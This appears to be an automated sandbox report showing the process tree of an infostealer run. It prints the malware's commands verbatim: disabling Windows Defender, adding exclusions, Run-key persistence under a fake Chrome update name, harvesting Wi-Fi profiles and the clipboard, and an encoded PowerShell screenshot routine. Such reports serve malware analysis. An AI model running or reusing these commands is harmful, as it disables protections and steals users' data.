        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        171⤵
        
        PID:5528
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        172⤵
        
        PID:3720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        173⤵
        
        PID:8996
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        174⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5680
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        174⤵
        
        PID:5364
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        175⤵
        
        PID:8440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        176⤵
        
        PID:9992
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        177⤵
        Suspicious use of SetWindowsHookEx
        
        PID:10096
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        177⤵
        
        PID:10224
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        178⤵
        
        PID:7988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        179⤵
        
        PID:3516
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        180⤵
        Suspicious use of SetWindowsHookEx
        
        PID:9356
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        180⤵
        
        PID:8016
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        181⤵
        
        PID:1948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        182⤵
        
        PID:2896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        183⤵
        Suspicious use of SetWindowsHookEx
        
        PID:9092
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        183⤵
        
        PID:212
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        184⤵
        
        PID:9848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        185⤵
        
        PID:5720
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        186⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6180
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        186⤵
        
        PID:6932
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        187⤵
        
        PID:6052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        188⤵
        
        PID:6712
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        189⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        189⤵
        
        PID:9376
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        190⤵
        
        PID:5028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        191⤵
        
        PID:9260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        192⤵
        Suspicious use of SetWindowsHookEx
        
        PID:9428
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        192⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        193⤵
        
        PID:9452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        194⤵
        
        PID:9028
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        195⤵
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        195⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        196⤵
        
        PID:3752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        197⤵
        
        PID:9244
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        198⤵
        Suspicious use of SetWindowsHookEx
        
        PID:8196
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        198⤵
        
        PID:7144
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        199⤵
        
        PID:9836
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        200⤵
        
        PID:8936
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        201⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        201⤵
        
        PID:10300
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        202⤵
        
        PID:10440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        203⤵
        
        PID:10516
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        204⤵
        Suspicious use of SetWindowsHookEx
        
        PID:10532
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        204⤵
        
        PID:10636
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        205⤵
        
        PID:10808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        206⤵
        
        PID:10916
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        207⤵
        Suspicious use of SetWindowsHookEx
        
        PID:10932
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        207⤵
        
        PID:11024
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        208⤵
        
        PID:11184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        209⤵
        
        PID:10424
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        210⤵
        Suspicious use of SetWindowsHookEx
        
        PID:10472
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        210⤵
        
        PID:10720
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        211⤵
        
        PID:11020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        212⤵
        
        PID:11260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        213⤵
        Suspicious use of SetWindowsHookEx
        
        PID:11516
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        213⤵
        
        PID:12448
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        214⤵
        
        PID:10800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        215⤵
        
        PID:11052
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        216⤵
        Suspicious use of SetWindowsHookEx
        
        PID:11768
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        216⤵
        
        PID:11352
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        217⤵
        
        PID:10388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        218⤵
        
        PID:12808
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        219⤵
        Suspicious use of SetWindowsHookEx
        
        PID:11536
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        219⤵
        
        PID:12992
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        220⤵
        
        PID:13236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        221⤵
        
        PID:4952
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        222⤵
        Suspicious use of SetWindowsHookEx
        
        PID:11668
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        222⤵
        
        PID:11784
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        223⤵
        
        PID:12532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        224⤵
        
        PID:12080
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        225⤵
        
        PID:12596
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        225⤵
        
        PID:12656
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        226⤵
        
        PID:10840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        227⤵
        
        PID:12820
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        228⤵
        Suspicious use of SetWindowsHookEx
        
        PID:11292
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        228⤵
        
        PID:12888
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        229⤵
        
        PID:11924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        230⤵
        
        PID:12092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        231⤵
        Suspicious use of SetWindowsHookEx
        
        PID:12116
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        231⤵
        
        PID:13136
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        232⤵
        
        PID:11160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        233⤵
        
        PID:10716
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        234⤵
        
        PID:10968
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        234⤵
        
        PID:9532
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        235⤵
        
        PID:10744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        236⤵
        
        PID:10924
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        237⤵
        Suspicious use of SetWindowsHookEx
        
        PID:11756
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        237⤵
        
        PID:12564
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        238⤵
        
        PID:12864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        239⤵
        
        PID:12940
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        240⤵
        Suspicious use of SetWindowsHookEx
        
        PID:12968
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        240⤵
        
        PID:13172
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        241⤵
        
        PID:10564
- - C:\Users\Admin\AppData\Local\Temp\main.exe
    "C:\Users\Admin\AppData\Local\Temp\main.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Users\Admin\AppData\Local\Temp\main.exe
      "C:\Users\Admin\AppData\Local\Temp\main.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3712
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI48522\Build.exe -pbeznogym
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4444
      - C:\Users\Admin\AppData\Local\Temp\_MEI48522\Build.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI48522\Build.exe -pbeznogym
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4552
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        7⤵
        Executes dropped EXE
        
        PID:4232
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        8⤵
        Executes dropped EXE
        
        PID:3076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI42322\s.exe -pbeznogym
        9⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\_MEI42322\s.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI42322\s.exe -pbeznogym
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2688
        
        C:\ProgramData\main.exe
        
        "C:\ProgramData\main.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2948
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAEBE.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpAEBE.tmp.bat
        12⤵
        
        PID:1876
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 2948"
        13⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5184
        
        C:\Windows\system32\find.exe
        
        find ":"
        13⤵
        
        PID:3536
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        13⤵
        Delays execution with timeout.exe
        
        PID:6436
        
        C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:7468
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        14⤵
        
        PID:8804
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        15⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:8836
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        11⤵
        Executes dropped EXE
        
        PID:5256
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        12⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        13⤵
        
        PID:2740
        
        C:\ProgramData\setup.exe
        
        "C:\ProgramData\setup.exe"
        11⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        
        PID:5764
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        7⤵
        Executes dropped EXE
        
        PID:2676
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        8⤵
        Executes dropped EXE
        
        PID:5012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
        9⤵
        
        PID:3244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        9⤵
        
        PID:3736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()""
        9⤵
        
        PID:4420
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
        10⤵
        
        PID:4704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‎ .scr'"
        9⤵
        
        PID:332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‎ .scr'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        9⤵
        
        PID:1212
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        10⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        9⤵
        
        PID:2148
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        10⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        9⤵
        
        PID:4908
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        9⤵
        
        PID:1460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        9⤵
        
        PID:2940
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        10⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        9⤵
        
        PID:1876
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        10⤵
        
        PID:6040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        9⤵
        
        PID:1580
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        10⤵
        
        PID:5848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        9⤵
        
        PID:2772
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        10⤵
        Gathers system information
        
        PID:5924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcA